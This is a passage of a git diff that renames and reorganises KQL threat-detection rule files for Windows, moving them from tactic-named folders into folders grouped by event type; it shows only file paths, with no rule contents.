KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql similarity index 100% rename from KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql rename to KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql diff --git a/KQL/rules/Defense Evasion/scr_file_write_event.kql b/KQL/rules/windows/file/file_event/scr_file_write_event.kql similarity index 100% rename from KQL/rules/Defense Evasion/scr_file_write_event.kql rename to KQL/rules/windows/file/file_event/scr_file_write_event.kql diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql similarity index 100% rename from KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql rename to KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql rename to KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql diff --git a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql similarity index 100% rename from KQL/rules/Privilege Escalation/startup_folder_file_write.kql rename to KQL/rules/windows/file/file_event/startup_folder_file_write.kql diff --git a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql rename to KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql diff --git a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql similarity index 100% rename from KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql rename to KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql rename to KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql diff --git a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql similarity index 100% rename from KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql rename to KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql diff --git a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql b/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql rename to KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql similarity index 100% rename from KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql rename to KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql b/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql rename to KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql rename to KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql diff --git a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql b/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_double_extension_files.kql rename to KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql rename to KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql rename to KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql diff --git a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_created_in_perflogs.kql rename to KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql diff --git a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql rename to KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql diff --git a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql rename to KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql diff --git a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql rename to KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql diff --git a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql rename to KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql rename to KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql rename to KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql diff --git a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql rename to KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql rename to KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql diff --git a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql b/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql similarity index 100% rename from KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql rename to KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql rename to KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql diff --git a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql rename to KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql rename to KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql rename to KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql rename to KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql rename to KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql rename to KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql diff --git a/KQL/rules/Command and Control/teamviewer_remote_session.kql b/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql similarity index 100% rename from KQL/rules/Command and Control/teamviewer_remote_session.kql rename to KQL/rules/windows/file/file_event/teamviewer_remote_session.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql similarity index 100% rename from KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql rename to KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql similarity index 100% rename from KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql rename to KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql diff --git a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql similarity index 100% rename from KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql rename to KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql rename to KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql similarity index 100% rename from KQL/rules/Resource Development/vhd_image_download_via_browser.kql rename to KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql similarity index 100% rename from KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql rename to KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql diff --git a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql similarity index 100% rename from KQL/rules/Persistence/vscode_powershell_profile_modification.kql rename to KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql diff --git a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql b/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql similarity index 100% rename from KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql rename to KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql diff --git a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql rename to KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql diff --git a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql similarity index 100% rename from KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql rename to KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql diff --git a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql similarity index 100% rename from KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql rename to KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql similarity index 100% rename from KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql rename to KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql diff --git a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql similarity index 100% rename from KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql rename to KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql rename to KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql diff --git a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql b/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql similarity index 100% rename from KQL/rules/Lateral Movement/wmiexec_default_output_file.kql rename to KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql similarity index 100% rename from KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql rename to KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/windows/file/file_event/writing_local_admin_share.kql similarity index 100% rename from KQL/rules/Privilege Escalation/writing_local_admin_share.kql rename to KQL/rules/windows/file/file_event/writing_local_admin_share.kql diff --git a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql b/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql similarity index 100% rename from KQL/rules/Execution/wscript_or_cscript_dropper_file.kql rename to KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql diff --git a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql similarity index 100% rename from KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql rename to KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql diff --git a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql rename to KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql diff --git a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql rename to KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql rename to KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql diff --git a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql similarity index 100% rename from KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql rename to KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql diff --git a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql similarity index 100% rename from KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql rename to KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql diff --git a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql similarity index 100% rename from KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql rename to KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql diff --git a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql rename to KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql diff --git a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql rename to KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql diff --git a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql rename to KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql rename to KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql diff --git a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql similarity index 100% rename from KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql rename to KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql diff --git a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql similarity index 100% rename from KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql rename to KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql diff --git a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql b/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql similarity index 100% rename from KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql rename to KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql diff --git a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql similarity index 100% rename from KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql rename to KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql similarity index 100% rename from KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql rename to KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql similarity index 100% rename from KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql rename to KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql similarity index 100% rename from KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql rename to KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql diff --git a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql similarity index 100% rename from KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql rename to KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql diff --git a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql b/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql similarity index 100% rename from KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql rename to KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql diff --git a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql similarity index 100% rename from KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql rename to KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql similarity index 100% rename from KQL/rules/Execution/mmc_loading_script_engines_dlls.kql rename to KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql diff --git a/KQL/rules/Execution/pcre_net_package_image_load.kql b/KQL/rules/windows/image_load/pcre_net_package_image_load.kql similarity index 100% rename from KQL/rules/Execution/pcre_net_package_image_load.kql rename to KQL/rules/windows/image_load/pcre_net_package_image_load.kql diff --git a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql similarity index 100% rename from KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql rename to KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql diff --git a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql 